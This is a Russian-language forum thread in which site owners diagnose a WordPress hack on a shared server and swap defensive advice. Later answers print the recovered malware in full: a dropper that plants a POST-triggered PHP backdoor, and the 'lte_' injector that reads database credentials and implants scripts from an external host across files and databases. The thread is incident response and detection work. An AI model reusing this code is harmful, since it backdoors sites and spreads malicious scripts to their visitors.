Как найти место взлома wordpress?

Question

[Bodrosh]

Здравствуйте, на сервере с несколькими сайтами wordpress произошёл взлом, каким образом можно диагностировать место взлома? вирус прошел по папкам на сервере, изменил права на файлы index.php и записал в индексные файлы свой код редиректа + поменял ссылки на свои в Базах данных (редиректы на directednotconverted.ml):

<script type='text/javascript' src='https://flat.lowerthenskyactive.ga/m.js?n=nb5'></script><?php
// Silence is golden.

Причем вирус прошел по всем остальным сайтам и базам данных, лежащим рядом.

Понятно, что дело может быть в плагинах, теме и самой wp, как это можно диагностировать, напр., по логам? Какая вообще логика у данного вида взлома? через запрос на конкретный файл?

Comments

[IvanMogilev]

Покупать плагины нужно, а не скачивать. Тут рассматривают ваш вирус

[Bodrosh]

IvanMogilev, Согласен, спасибо, но и в примере указан бесплатный плагин Wordfence, через который в их случае происходил взлом. Как лечить понятно, вот как найти дыру - нет.

[IvanMogilev]

Bodrosh, очень странно, у него 3 миллиона скачиваний и не одного упоминания об взломах. WP File Manager случайно не стоит у вас? вот с ним недавно были проблемы.
В любом случае рекомендации стандартные обновить все плагины/темы/сам вп, поставить Wp Cerber, сверить файлы движка, темы и плагинов с файлами из официального каталога с помощью него.

[Bodrosh]

IvanMogilev, да в том то и дело, ни того, ни того не стоит. Спасибо за рекомендации.

[IvanMogilev]

Bodrosh,

Причем вирус прошел по всем остальным сайтам и базам данных, лежащим рядом.

, а с чего вы взяли что именно этот сайт стал разносчиком? Потому что если вы не скачивали платные плагины, то даже и не знаю откуда там взяться вирусам.

[Ярослав Александров]

на сервере с несколькими сайтами wordpress

- сервер ваш выделенный или виртуальный тариф хостинга?
- какой хостинг провайдер?
- несколько сайтов ваши на одном аккаунте хостинга или чужие с разными аккаунтами?

[Bodrosh]

IvanMogilev, Думаю какой-то из сайтов, а уже через него по остальным каталогам и базам прошлись. Как это сделали - пока не представляю.

[Bodrosh]

Ярослав Александров, VDS, netangels, на одном аккаунте

[Ярослав Александров]

Bodrosh, сами вы дыру на сайте wordpress не найдёте, таких инструментов нет. Вариантов взлома очень много. Логи на сервере вам ничем не помогут.
Сайты wordpress нужно разносить по разным аккаунтам, размещение их в одной директории это ошибка администрирования сервера. Также я думаю у вас нет на VDS подключенной антивирусной услуги, это позволяет узнавать о взломе wordpress в день взлома и получать логи антивирусной проверки с путями на файлы взлома.
Также многое зависит от качества администрирования физического сервера провайдером

[Bodrosh]

Ярослав Александров, Спасибо, согласен, первым дело будет разнос по разным аккаунтам... Спасибо за ответ.

[Вова Дружаев]

Воровать не надо))
Спиратил же наверняка что-то к себе - запас карман не тянет?

Answer 1

[Богдан Герасименко]

Обычно, вирус находится в nulled плагине или теме, скачанной с пиратского сайта. Вот, пример такого вируса.

Следовательно, начинать лечение сайта нужно с поиска зараженного плагина или темы (файл functions.php). А то, что вирус на соседние сайты полез, значит, что у вас на сервере в PHP не настроены ограничения open_basedir. Я после таких заражений всюду установил open_basedir: /home/user/site.com/www (огранил видимость в пределах www) - так вирус не сможет просканировать другие папки за пределами одного домена.

Есть антивирусы по типу AiBolit - они находят вирусы в коде.

Comments

[Bodrosh]

Спасибо большое, на сервере поддержка как раз запускала данный антивирус, но это уже диагностика последствий, может помочь определить даты изменения файлов и сами файлы. А перенос сайтов разным пользователям (1 сайт - 1 пользователь) решит данную проблему или всё равно с open_basedir стОит посмотреть?

[N]

Bodrosh, 1 сайт - 1 пользователь
Это, как минимум, лучше и безопаснее!
Тут хотя бы одного "сломали"...других - будет сложнее...тут уже от настроек сервера зависит...но в любом случае это намного усложнит задачу "распространения" на "других"...

[Богдан Герасименко]

Bodrosh, 1 сайт - 1 пользователь это называется изолированные аккаунты. На хостинге Ukraine.com.ua такое по умолчанию, на Beget кажись тоже.

[Bodrosh]

Богдан Герасименко, спасибо, согласен, нужно разносить сайты по аккаунтам. Кстати это помогло, атака повторилась и снова пострадал теперь уже один из сайтов, хоть стало ясно какой.
В логах кстати обнаружил странность, на сайте нет такого плагина (и папки), а в ответ с кодом 200 стоял

"GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.0" 200"

И много обращений

"POST /xmlrpc.php HTTP/1.0" 200
 "GET /wp-login.php HTTP/1.0" 200

Это могут быть попытками взлома?

Answer 2

[Bodrosh]

Уязвимость найдена, возможно кому-то поможет.
По логам прослеживались обращения:

51.38.106.48 - - [02/Nov/2020:19:55:53 +0000] "POST /wp-content/uploads/elementor/custom-icons/-1/css/ HTTP/1.0" 200 181 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
51.38.106.48 - - [02/Nov/2020:19:55:55 +0000] "POST /wp-stream.php HTTP/1.0" 200 197 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
51.38.106.48 - - [02/Nov/2020:19:55:58 +0000] "POST /wp-content/uploads/wp-stream.php HTTP/1.0" 200 197 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"

В одном из плагинов (/wp-content/uploads/elementor/custom-icons/-1/css/index.php), как и предполагалось, находился данный код:

echo "ssqqss>>>";
error_reporting(0);
ini_set('display_errors',0);

make_wpupload_file($_SERVER['DOCUMENT_ROOT'].'/wp-content/uploads');

 function make_wpupload_file($dir) {

	$b = base64_decode('PD9waHAgIGlmKGlzc2V0KCRfUE9TVFsnbHQnXSkgJiYgbWQ1KCRfUE9TVFsnbHQnXSkgPT0gYmFzZTY0X2RlY29kZSgiTURJek1qVTRZbUpsWWpkalpUazFOV0UyT1RCa1kyRXdOVFppWlRnNE5XUT0iKSApIHskbHQgPSBiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYSddKTtmaWxlX3B1dF9jb250ZW50cygnbHRlXycsJzw/cGhwICcuJGx0KTskbHQ9J2x0ZV8nO2lmKGZpbGVfZXhpc3RzKCRsdCkpe2luY2x1ZGUoJGx0KTt1bmxpbmsoJGx0KTt9fSA/Pg==');
	if(!file_exists($dir.'/wp-stream.php')){
		@file_put_contents($dir.'/wp-stream.php',$b);
		@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/wp-stream.php',$b);
	}
  
}

unlink(__FILE__);

При взломе так же пытались найти на сервере следующие файлы и пути, уязвимости могут быть и в них:

/wp-content/plugins/widget-settings-importexport/widget-data.js
/wp-content/plugins/letme/weblinks.php
/wp-content/plugins/background-image-cropper/ups.php.suspected
/wp-content/uploads/2020/10/content-post.php
/wp-content/wp-muen.php
/wp-content/uploads/2020/04/blackhat.php
/wp-content/plugins/wp-members/assets/js/wpmem-nav-menu.min.js
/wp-content/plugins/superstorefinder-wp/css/ssf-wp-admin.css
/my-accountsuc_reg
/my-accountcanreg
/wp-content/themes/CP20/content-post.php.suspected
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/wp-content/uploads/wp-stream.php
/wp-admin/theme-install.php
/xmlrpc.php
/installer.php
/wp-content/themes/distance-lite/languages/namespaces.php

Answer 3

[Руслан]

Попробуйте сканеры безопасности их очень много разных

Answer 4

[jahtaka]

Там каким-то образом кладётся файлик "lte_", я пока не определил способ его размещения на сервере. Из него начиает постить код в PHP JS HTM файлы и в базу с редиректом. Тысячами.

Ai-bolit всё это находит, благодаря ему как раз и обнаружил.

Файл "lte_" :

spoiler

<?php echo "ssqqss>>>";
error_reporting(0);
ini_set('display_errors',0);


search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
die();

  
function get_var_reg($pat,$text) {
	
	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
	{
		return $matches[1][0];
	}
		
	return "";
}
function search_file_ms($dir,$file_to_search){

$search_array = array();

$files = scandir($dir);

if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file_ms( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file_ms( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){


    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false) {
		
			show_sitenames($path);
			
			
			
        }

    } else if($value != "." && $value != "..") {

        @search_file_ms($path, $file_to_search);

    }  
 } 
}
function show_sitenames($file){
	$content = @file_get_contents($file);
	if(strpos($content, "DB_NAME") !== false) {
	
	
	$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
	$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
	$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
	$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {
 
} else { 


$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
		$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
	$result2 = $conn->query($q2);
	if ($result2->num_rows > 0) {
		while($row2 = $result2->fetch_assoc()) {
			$val = $row2['post_content'];
			if(strpos($val, "flat.lowerthenskyactive.ga") === false){
				if(strpos($val, "flat.lowerthenskyactive.ga") === false){
					
				
					$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://flat.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%flat.lowerthenskyactive.ga%'";
					$conn->query($q3);
					echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
				
				} else {
				
				}

			} 
		}
	} else {
	}
    }
} else {
}
$conn->close();
}
}
}

function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

		make_it($path);

    } }else if($value != "." && $value != "..") {

        search_file($path, $file_to_search);

    }  
 } 

}

function search_file_index($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		search_file_index( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		search_file_index( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

		make_it_index($path);

    } }else if($value != "." && $value != "..") {

        search_file_index($path, $file_to_search);

    }  
 } 

}
function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file_js( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file_js( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {

		make_it_js($path);

    } }else if($value != "." && $value != "..") {

        search_file_js($path, $file_to_search);

    }  
 } 

}

function make_it_js($f){
			$g = file_get_contents($f);
			
										

if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "js:".$f."\r\n";
}

			
}
function make_it_index($f){
$g = file_get_contents($f);
if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false || strpos($g, 'flat.lowerthenskyactive.ga') !== false) {

} else {
$l2 = "<script type='text/javascript' src='https://flat.lowerthenskyactive.ga/m.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;

@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."\r\n";


			}
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}


			}
}

Comments

[Bodrosh]

Да, Ai-bolit тоже проверял, но он уже последствия выявил, проще откатиться (если есть такая возможность), чем бороться с ними. Вот в base64_decode как раз ваш файлик фигурирует в зашифрованном виде.

[jahtaka]

Нашёл такое руководство, по идее оно поможет решить эту проблему: https://techbear.ru/rukovodstvo-po-bezopasnosti-wo...

[jahtaka]

Bodrosh, получается, что base64_decode и есть источник этого файла?

[Bodrosh]

jahtaka, вот у меня в файле было

$b = base64_decode('PD9waHAgIGlmKGlzc2V0KCRfUE9TVFsnbHQnXSkgJiYgbWQ1KCRfUE9TVFsnbHQnXSkgPT0gYmFzZTY0X2RlY29kZSgiTURJek1qVTRZbUpsWWpkalpUazFOV0UyT1RCa1kyRXdOVFppWlRnNE5XUT0iKSApIHskbHQgPSBiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYSddKTtmaWxlX3B1dF9jb250ZW50cygnbHRlXycsJzw/cGhwICcuJGx0KTskbHQ9J2x0ZV8nO2lmKGZpbGVfZXhpc3RzKCRsdCkpe2luY2x1ZGUoJGx0KTt1bmxpbmsoJGx0KTt9fSA/Pg==');

Если его расшифровать через любой онлайн декодер base64 получается:

<?php  if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>

Т.е. часто код прячут именно через эти функции base64, по ним можно поискать подозрительные места, напр., так:

grep --color  -r 'base64_decode' /var/www/user/data/www/site.ru/
find . -type f -name '*.php' -exec grep --color -r ssqqss {} +  
find . -type f -name '*.php' -exec grep base64 {} +

Answer 5

[MrGroovy]

Уязвимости в WP бывают двух видов - устаревшая версия самого WP и уязвимости в плагинах и темах. Крайне опасно использовать "крякнутые" темы, в них часто вшивают вредоносный код. Чтобы найти уязвимости в Wordpress можно воспользоваться специальным сканером для WP. Навскидку, это:
- https://metascan.ru;
- wprecon.com;
- hackertarget.com/wordpress-security-scan.
И разумеется быть аккуратнее с бесплатными темами и сомнительными плагинами, так как они изначально могут содержать в себе вирусы.

Comments

[Bodrosh]

Согласен, хорошие советы.